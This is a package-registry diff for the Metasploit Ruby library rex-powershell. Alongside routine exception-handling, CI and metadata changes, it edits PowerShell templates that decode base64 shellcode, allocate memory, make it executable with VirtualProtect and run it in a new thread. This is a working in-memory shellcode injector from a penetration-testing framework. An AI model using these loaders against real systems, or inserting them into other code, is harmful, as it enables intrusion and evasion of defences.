rex-powershell 0.1.91 → 0.1.95

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
checksums.yaml CHANGED
@@ -1,7 +1,7 @@
1
1
  ---
2
2
  SHA256:
3
- metadata.gz: 03fb4a7843aafdad4a8a05217105768f959653f7b15c00273398afea46497385
4
- data.tar.gz: 49fe72538e0fa7acc8a9f418cac9905d65e4fbf61e5b2b36cca4df6fbb20eee5
3
+ metadata.gz: bf167124561f5b5aa34b7b5117293e8d977a0c6c0efd936b450c3b3c605ee1c5
4
+ data.tar.gz: 91381dc9267c0f19c43be9bbc399928ab759427aff764e2682a0362abc05f0ba
5
5
  SHA512:
6
- metadata.gz: 846f848e693acefa04b7850a983bfd52bccddc422d9454787fc241fc41323f55747f51d7707632fdca78376219ba7adee55c885b87b5d466376c95e1d5cf9993
7
- data.tar.gz: e164850d612b3b32d98c5b620ef842f5ede29a86d5d5db0e0a8aa339aa471e01715a670be1ee75fa0223a823772df59ff16a05374ab06c0bfecb90f3d511a312
6
+ metadata.gz: d9659e411b02341fcb7a34f75a69a3b3237fd4619d6a51eab6914a695731497302bab232ea11ca9997f5c7cf05996eefb1e46e27e5edf7957d050853e16143c2
7
+ data.tar.gz: f7758453f3f03d28ff3a63270ffd6b7c1ae5a9a5890a66cf3334a76ad0db87db12f304319afa472ff29a6b5a7f9515957e7aaaf84a8116fa6d2d3fd06564b1f0
checksums.yaml.gz.sig CHANGED
Binary file
@@ -0,0 +1,46 @@
1
+ name: Verify
2
+
3
+ on:
4
+ push:
5
+ branches:
6
+ - '*'
7
+ pull_request:
8
+ branches:
9
+ - '*'
10
+
11
+ jobs:
12
+ test:
13
+ runs-on: ubuntu-18.04
14
+ timeout-minutes: 40
15
+
16
+ strategy:
17
+ fail-fast: true
18
+ matrix:
19
+ ruby:
20
+ - 2.5
21
+ - 2.6
22
+ - 2.7
23
+ - 3.0
24
+ test_cmd:
25
+ - bundle exec rspec
26
+
27
+ env:
28
+ RAILS_ENV: test
29
+
30
+ name: Ruby ${{ matrix.ruby }} - ${{ matrix.test_cmd }}
31
+ steps:
32
+ - name: Checkout code
33
+ uses: actions/checkout@v2
34
+
35
+ - name: Setup Ruby
36
+ uses: ruby/setup-ruby@v1
37
+ with:
38
+ ruby-version: ${{ matrix.ruby }}
39
+ bundler-cache: true
40
+
41
+ - name: ${{ matrix.test_cmd }}
42
+ run: |
43
+ echo "${CMD}"
44
+ bash -c "${CMD}"
45
+ env:
46
+ CMD: ${{ matrix.test_cmd }}
@@ -5,9 +5,10 @@ $%{var_syscode} = @"
5
5
  namespace %{var_kernel32} {
6
6
  public class func {
7
7
  [Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }
8
- [Flags] public enum MemoryProtection { ExecuteReadWrite = 0x40 }
8
+ [Flags] public enum MemoryProtection { ReadWrite = 0x04, Execute= 0x10 }
9
9
  [Flags] public enum Time : uint { Infinite = 0xFFFFFFFF }
10
10
  [DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
11
+ [DllImport("kernel32.dll")] public static extern bool VirtualProtect(IntPtr lpAddress, int dwSize, int flNewProtect,out int lpflOldProtect);
11
12
  [DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
12
13
  [DllImport("kernel32.dll")] public static extern int WaitForSingleObject(IntPtr hHandle, Time dwMilliseconds);
13
14
  }
@@ -21,10 +22,14 @@ $%{var_compileParams}.GenerateInMemory = $True
21
22
  $%{var_output} = $%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams}, $%{var_syscode})
22
23
 
23
24
  [Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
25
+ [Uint32]$%{var_opf} = 0
24
26
 
25
- $%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::ExecuteReadWrite)
27
+ $%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::ReadWrite)
26
28
  if ([Bool]!$%{var_baseaddr}) { $global:result = 3; return }
27
29
  [System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_baseaddr}, $%{var_code}.Length)
28
- [IntPtr] $%{var_threadHandle} = [%{var_kernel32}.func]::CreateThread(0,0,$%{var_baseaddr},0,0,0)
29
- if ([Bool]!$%{var_threadHandle}) { $global:result = 7; return }
30
- $%{var_temp} = [%{var_kernel32}.func]::WaitForSingleObject($%{var_threadHandle}, [%{var_kernel32}.func+Time]::Infinite)
30
+
31
+ if ([%{var_kernel32}.func]::VirtualProtect($%{var_baseaddr},[Uint32]$%{var_code}.Length + 1, [%{var_kernel32}.func+MemoryProtection]::Execute, [Ref]$%{var_opf}) -eq $true ) {
32
+ [IntPtr] $%{var_threadHandle} = [%{var_kernel32}.func]::CreateThread(0,0,$%{var_baseaddr},0,0,0)
33
+ if ([Bool]!$%{var_threadHandle}) { $global:result = 7; return }
34
+ $%{var_temp} = [%{var_kernel32}.func]::WaitForSingleObject($%{var_threadHandle}, [%{var_kernel32}.func+Time]::Infinite)
35
+ }
@@ -1,27 +1,29 @@
1
1
  function %{func_get_proc_address} {
2
- Param ($%{var_module}, $%{var_procedure})
3
- $%{var_unsafe_native_methods} = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
2
+ Param ($%{var_module}, $%{var_procedure})
3
+ $%{var_unsafe_native_methods} = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
4
4
 
5
- return $%{var_unsafe_native_methods}.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($%{var_unsafe_native_methods}.GetMethod('GetModuleHandle')).Invoke($null, @($%{var_module})))), $%{var_procedure}))
5
+ return $%{var_unsafe_native_methods}.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($%{var_unsafe_native_methods}.GetMethod('GetModuleHandle')).Invoke($null, @($%{var_module})))), $%{var_procedure}))
6
6
  }
7
7
 
8
8
  function %{func_get_delegate_type} {
9
- Param (
10
- [Parameter(Position = 0, Mandatory = $True)] [Type[]] $%{var_parameters},
11
- [Parameter(Position = 1)] [Type] $%{var_return_type} = [Void]
12
- )
9
+ Param (
10
+ [Parameter(Position = 0, Mandatory = $True)] [Type[]] $%{var_parameters},
11
+ [Parameter(Position = 1)] [Type] $%{var_return_type} = [Void]
12
+ )
13
13
 
14
- $%{var_type_builder} = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
15
- $%{var_type_builder}.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
16
- $%{var_type_builder}.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $%{var_return_type}, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
14
+ $%{var_type_builder} = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
15
+ $%{var_type_builder}.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
16
+ $%{var_type_builder}.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $%{var_return_type}, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
17
17
 
18
- return $%{var_type_builder}.CreateType()
18
+ return $%{var_type_builder}.CreateType()
19
19
  }
20
20
 
21
21
  [Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
22
+ [Uint32]$%{var_opf} = 0
23
+ $%{var_buffer} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualAlloc), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $%{var_code}.Length,0x3000, 0x04)
22
24
 
23
- $%{var_buffer} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualAlloc), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $%{var_code}.Length,0x3000, 0x40)
24
25
  [System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_buffer}, $%{var_code}.length)
25
-
26
- $%{var_hthread} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll CreateThread), (%{func_get_delegate_type} @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$%{var_buffer},[IntPtr]::Zero,0,[IntPtr]::Zero)
27
- [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll WaitForSingleObject), (%{func_get_delegate_type} @([IntPtr], [Int32]))).Invoke($%{var_hthread},0xffffffff) | Out-Null
26
+ if (([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualProtect), (%{func_get_delegate_type} @([IntPtr], [UIntPtr], [UInt32], [UInt32].MakeByRefType()) ([Bool]))).Invoke($%{var_buffer}, [Uint32]$%{var_code}.Length, 0x10, [Ref]$%{var_opf})) -eq $true) {
27
+ $%{var_hthread} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll CreateThread), (%{func_get_delegate_type} @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$%{var_buffer},[IntPtr]::Zero,0,[IntPtr]::Zero)
28
+ [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll WaitForSingleObject), (%{func_get_delegate_type} @([IntPtr], [Int32]))).Invoke($%{var_hthread},0xffffffff) | Out-Null
29
+ }
@@ -293,11 +293,11 @@ EOS
293
293
  # @return [String] Powershell command line with payload
294
294
  def self.cmd_psh_payload(pay, payload_arch, template_path, opts = {})
295
295
  if opts[:encode_inner_payload] && opts[:encode_final_payload]
296
- fail RuntimeError, ':encode_inner_payload and :encode_final_payload are incompatible options'
296
+ fail Exceptions::PowershellError, ':encode_inner_payload and :encode_final_payload are incompatible options'
297
297
  end
298
298
 
299
299
  if opts[:no_equals] && !opts[:encode_final_payload]
300
- fail RuntimeError, ':no_equals requires :encode_final_payload option to be used'
300
+ fail Exceptions::PowershellError, ':no_equals requires :encode_final_payload option to be used'
301
301
  end
302
302
 
303
303
  psh_payload = case opts[:method]
@@ -310,7 +310,7 @@ EOS
310
310
  when 'msil'
311
311
  Rex::Powershell::Payload.to_win32pe_psh_msil(template_path, pay)
312
312
  else
313
- fail RuntimeError, 'No Powershell method specified'
313
+ fail Exceptions::PowershellError, 'No Powershell method specified'
314
314
  end
315
315
 
316
316
  if opts[:exec_rc4]
@@ -405,7 +405,7 @@ EOS
405
405
  end
406
406
 
407
407
  if command.length > 8191
408
- fail RuntimeError, 'Powershell command length is greater than the command line maximum (8192 characters)'
408
+ fail Exceptions::PowershellCommandLengthError, 'Powershell command length is greater than the command line maximum (8192 characters)'
409
409
  end
410
410
 
411
411
  command
@@ -0,0 +1,16 @@
1
+ # -*- coding: binary -*-
2
+
3
+ module Rex
4
+ module Powershell
5
+ module Exceptions
6
+
7
+ class PowershellError < RuntimeError
8
+ end
9
+
10
+ class PowershellCommandLengthError < PowershellError
11
+ end
12
+
13
+ end
14
+ end
15
+ end
16
+
@@ -67,7 +67,7 @@ module Powershell
67
67
  # Deobfuscate a Powershell literal string value that was previously obfuscated by #scate_string_literal.
68
68
  #
69
69
  # @param [String] string The obfuscated Powershell expression to deobfuscate.
70
- # @raises [RuntimeError] If the string can not be deobfuscated, for example because it was randomized using a
70
+ # @raises [Exceptions::PowershellError] If the string can not be deobfuscated, for example because it was randomized using a
71
71
  # different routine, then an exception is raised.
72
72
  # @return [String] The string literal value.
73
73
  def self.descate_string_literal(string)
@@ -79,14 +79,14 @@ module Powershell
79
79
  format = Regexp.last_match(0)
80
80
  format_args = string[format.length..-1].strip
81
81
  unless format_args =~ /-f\s*('.',\s*)*('.')/
82
- raise RuntimeError.new('The obfuscated string structure is unsupported')
82
+ raise Exceptions::PowershellError, 'The obfuscated string structure is unsupported'
83
83
  end
84
84
  format_args = format_args[2..-1].strip.scan(/'(.)'/).map { |match| match[0] }
85
85
  string = format[1...-1].strip
86
86
  end
87
87
 
88
88
  unless string =~ /^'.*'$/
89
- raise RuntimeError.new('The obfuscated string structure is unsupported')
89
+ raise Exceptions::PowershellError, 'The obfuscated string structure is unsupported'
90
90
  end
91
91
  string = string.gsub(/'\s*\+\s*'/, '') # process all concatenation operations
92
92
  unless format_args.nil? # process all format string operations
@@ -146,7 +146,7 @@ module Powershell
146
146
  elsif @code =~ /FromBase64String(\((?>[^)(]+|\g<1>)*\))/
147
147
  encoded_stream = Obfu.descate_string_literal(Regexp.last_match(1))
148
148
  else
149
- raise RuntimeError, 'Failed to identify the base64 data'
149
+ raise Exceptions::PowershellError, 'Failed to identify the base64 data'
150
150
  end
151
151
 
152
152
  # Decode and decompress the string
@@ -157,7 +157,7 @@ module Powershell
157
157
  begin
158
158
  @code = Rex::Text.zlib_inflate(unencoded)
159
159
  rescue Zlib::DataError => e
160
- raise RuntimeError, 'Invalid compression'
160
+ raise Exceptions::PowershellError, 'Invalid compression'
161
161
  end
162
162
  end
163
163
 
@@ -37,10 +37,10 @@ module Payload
37
37
  def self.to_win32pe_psh(template_path = TEMPLATE_DIR, code)
38
38
  hash_sub = {}
39
39
  hash_sub[:var_code] = Rex::Text.rand_text_alpha(rand(8)+8)
40
- hash_sub[:var_win32_func] = Rex::Text.rand_text_alpha(rand(8)+8)
40
+ hash_sub[:var_win32_func] = Rex::Text.rand_text_alpha(rand(8)+8)
41
41
  hash_sub[:var_payload] = Rex::Text.rand_text_alpha(rand(8)+8)
42
42
  hash_sub[:var_size] = Rex::Text.rand_text_alpha(rand(8)+8)
43
- hash_sub[:var_rwx] = Rex::Text.rand_text_alpha(rand(8)+8)
43
+ hash_sub[:var_rwx] = Rex::Text.rand_text_alpha(rand(8)+8)
44
44
  hash_sub[:var_iter] = Rex::Text.rand_text_alpha(rand(8)+8)
45
45
  hash_sub[:var_syscode] = Rex::Text.rand_text_alpha(rand(8)+8)
46
46
 
@@ -55,7 +55,6 @@ module Payload
55
55
  # Originally from PowerSploit
56
56
  #
57
57
  def self.to_win32pe_psh_reflection(template_path = TEMPLATE_DIR, code)
58
- # Intialize rig and value names
59
58
  rig = Rex::RandomIdentifier::Generator.new(DEFAULT_RIG_OPTS)
60
59
  rig.init_var(:func_get_proc_address)
61
60
  rig.init_var(:func_get_delegate_type)
@@ -48,7 +48,7 @@ module Powershell
48
48
 
49
49
  # Close open file
50
50
  fd.close
51
- rescue Errno::ENAMETOOLONG, Errno::ENOENT
51
+ rescue Errno::ENAMETOOLONG, Errno::ENOENT, Errno::EINVAL
52
52
  # Treat code as a... code
53
53
  @code = code.to_s.dup # in case we're eating another script
54
54
  end
@@ -1,5 +1,5 @@
1
1
  module Rex
2
2
  module Powershell
3
- VERSION = "0.1.91"
3
+ VERSION = "0.1.95"
4
4
  end
5
5
  end
@@ -1,5 +1,6 @@
1
1
  # -*- coding: binary -*-
2
2
  require 'rex/powershell/version'
3
+ require 'rex/powershell/exceptions'
3
4
  require 'rex/powershell/output'
4
5
  require 'rex/powershell/parser'
5
6
  require 'rex/powershell/obfu'
data.tar.gz.sig CHANGED
Binary file
metadata CHANGED
@@ -1,7 +1,7 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: rex-powershell
3
3
  version: !ruby/object:Gem::Version
4
- version: 0.1.91
4
+ version: 0.1.95
5
5
  platform: ruby
6
6
  authors:
7
7
  - Metasploit Hackers
@@ -93,7 +93,7 @@ cert_chain:
93
93
  EknWpNgVhohbot1lfVAMmIhdtOVaRVcQQixWPwprDj/ydB8ryDMDosIMcw+fkoXU
94
94
  9GJsSaSRRYQ9UUkVL27b64okU8D48m8=
95
95
  -----END CERTIFICATE-----
96
- date: 2021-07-09 00:00:00.000000000 Z
96
+ date: 2022-02-14 00:00:00.000000000 Z
97
97
  dependencies:
98
98
  - !ruby/object:Gem::Dependency
99
99
  name: rake
@@ -173,6 +173,7 @@ executables: []
173
173
  extensions: []
174
174
  extra_rdoc_files: []
175
175
  files:
176
+ - ".github/workflows/verify.yml"
176
177
  - ".gitignore"
177
178
  - ".rspec"
178
179
  - ".travis.yml"
@@ -188,6 +189,7 @@ files:
188
189
  - data/templates/to_mem_rc4.ps1.template
189
190
  - lib/rex/powershell.rb
190
191
  - lib/rex/powershell/command.rb
192
+ - lib/rex/powershell/exceptions.rb
191
193
  - lib/rex/powershell/function.rb
192
194
  - lib/rex/powershell/obfu.rb
193
195
  - lib/rex/powershell/output.rb
metadata.gz.sig CHANGED
Binary file